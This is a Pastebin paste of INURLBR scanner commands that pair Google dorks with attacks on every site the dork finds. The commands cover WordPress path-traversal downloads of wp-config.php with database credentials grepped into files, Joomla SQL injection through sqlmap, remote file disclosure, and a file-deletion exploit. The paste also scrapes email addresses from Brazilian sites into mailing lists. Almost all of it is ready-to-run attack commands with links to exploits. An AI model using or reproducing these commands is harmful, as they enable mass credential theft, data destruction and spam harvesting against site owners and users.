Googleinurl

EXAMPLES CONTROLS INURLBR

Jan 1st, 2015
2,495
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. [!] CONTROL SERIES
  2. # AUTOR: Cleiton Pinheiro / NICK: GoogleINURL
  3. # Blog: http://blog.inurl.com.br
  4. # Twitter: https://twitter.com/googleinurl
  5. # Fanpage: https://fb.com/InurlBrasil
  6. # GIT: https://github.com/googleinurl
  7. # YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  8. # PACKETSTORMSECURITY:: http://packetstormsecurity.com/user/googleinurl/
  9.  
  10. [!]::COMMANDS USED IN THE SCANNER INURLBR | https://github.com/googleinurl/SCANNER-INURLBR
  11. ----------------------------------------------------------------------------------------------------
  12.  
  13. [+] Arbitrary File Download
  14. ./inurlbr.php --dork '"canetas" "/revslider/"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-vul 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' }
  15.  
  16.  
  17. ./inurlbr.php --dork '"inurl:/themes/urban/" "www"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php' -t 3 --exploit-comand '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' }
  18.  
  19. EXPLOIT:
  20. http://pastebin.com/ZEnbxXXd
  21. OR
  22. http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
  23. ----------------------------------------------------------------------------------------------------
  24.  
  25. [+] FILTER AND MAIL
  26. ./inurlbr.php --dork 'site:.br @ gmail|hotmail|terra|uol ext:txt' -q all -s MEGA.txt -m
  27.  
  28. cat Lista.txt | egrep '@bol.com.br|@terra.com.br' |cut -d \; -f 1 | sort -u >> bolterra.txt
  29.  
  30. cat Lista.txt | egrep '@zipmail.com.br' |cut -d \; -f 1 | sort -u >> ZIPMAIL.txt
  31.  
  32. ./inurlbr.php --dork='site:.br intext:gmail || intext:hotmail ext:txt -hdutl -upnet -static' --arquivo='TOPGMAIL.txt'
  33. ----------------------------------------------------------------------------------------------------
  34.  
  35. [+] EXPLOIT COMPONENT JOOMLA
  36. ./inurlbr.php --dork '"com_spidercalendar" +"noticias"' -s spider.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'027" --comand-vul "python spyder.py -H http://_TARGET_/"
  37.  
  38. EXPLOIT:
  39. http://www.exploit-db.com/exploits/20983/
  40. ----------------------------------------------------------------------------------------------------
  41.  
  42. [+] EGYWEB (Mantrac) <= Remote File Disclosure Exploit
  43. ./inurlbr.php --dork '"Created by EGYWEB"' -s rcdz.txt -q 1,6 -t 3 --exploit-get "/360download.php?file_name=classes/db_connector.php" --comand-vul "python rcd.py http://_TARGET_/"
  44.  
  45. EXPLOIT:
  46. http://1337day.com/exploit/22643
  47. ----------------------------------------------------------------------------------------------------
  48.  
  49. [+] Joomla Spider Form Maker <= 3.4 - SQLInjection
  50. ./inurlbr.php --dork '"com_formmaker" +"contato"' -q 1,6 -s com_formmaker.txt -t 3 --exploit-get '/index.php?option=com_formmaker&view=formmaker&id=-1+AND+(SELECT+User+from+mysql.user+limit+0,1)' -a 'mysql.user' --comand-vul "python sqlmap.py -u '_TARGET_/index.php?option=com_formmaker&view=formmaker&id=1' -p id --batch --random-agent --dbs"
  51.  
  52. EXPLOIT:
  53. http://www.exploit-db.com/exploits/34637/
  54. ----------------------------------------------------------------------------------------------------
  55.  
  56. [+] Wordpress Theme Strange File Upload / File Deletion
  57. ./inurlbr.php --dork '"movie" "/wp-content/themes/ut-strange/"' -s del.txt -q 1,6 -t 3 --exploit-get "/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" --comand-all "php delete.php http://_TARGET_/ wp.php"
  58.  
  59. EXPLOIT:
  60. http://de.1337day.com/exploit/22674
  61. ----------------------------------------------------------------------------------------------------
RAW Paste Data